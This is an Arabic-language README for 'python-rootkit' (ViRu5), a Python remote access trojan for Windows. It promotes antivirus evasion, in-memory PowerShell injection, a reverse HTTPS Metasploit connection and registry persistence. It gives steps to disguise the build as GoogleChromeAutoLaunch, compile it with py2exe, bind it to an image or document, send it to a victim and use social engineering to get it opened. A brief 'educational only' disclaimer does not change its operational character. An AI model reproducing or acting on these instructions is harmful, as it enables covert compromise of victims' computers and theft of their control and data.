python-rootkit
هذا برنامج RAT بايثون كامل غير قابل للكشف يمكنه تجاوز جميع برامج مكافحة الفيروسات تقريبًا وفتح باب خلفي داخل أي جهاز ويندوز سيقوم بإنشاء اتصال Metasploit عكسي عبر HTTPS بجهاز الاستماع الخاص بك.
دورة حياة ViRu5
- تجاوز جميع برامج مكافحة الفيروسات.
- حقن سكريبت باورشيل ضار في الذاكرة.
- إنشاء اتصال https عكسي بجهاز المهاجم.
- التحقق كل 10 ثوانٍ والتأكد من أن الاتصال لا يزال موجودًا، إذا لم يكن كذلك، فسيتم إعادة إنشاء اتصال جديد.
- إضافة مفتاح تسجيل بدء التشغيل لإعادة الاتصال بالمهاجم بعد إعادة التشغيل.
الخطوات
- قم بتحديث معاملات viRu5/source.py باستخدام lhost و lport الخاصين بك.
- غيّر اسم source.py إلى GoogleChromeAutoLaunch.py
- أضف GoogleChromeAutoLaunch.py و setup.py وأيقونتك كـ icon.ico إلى مجلد c:\python27
- من موجه الأوامر نفذ
cd c:\python27 && python setup.py py2exe
- ابحث عن ملف RAT في مجلد Dist.
- قم بدمجه مع أي صورة أو pdf أو word أو أي نوع من الملفات
- أرسله إلى الضحية
- استخدم مهارات الهندسة الاجتماعية لديك لجعله يفتح الملفات
- ستتلقى اتصال metasoplit عكسي عبر https :)
تم الاختبار على
- Windows 7 x64/x86
- Widowns 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
شكر وتقدير
شكرًا لكل باحث أمني يقضي وقتًا لمساعدة الآخرين وجعل المجتمع أكثر قوة. شكرًا لفريق powerShellEmpire.
إخلاء مسؤولية
هذا للأغراض التعليمية فقط. أولاً وقبل كل شيء، يهدف هذا الكود إلى تنبيه الناس حول المشكلات الأمنية التي تصيب الأجهزة غير المحدثة.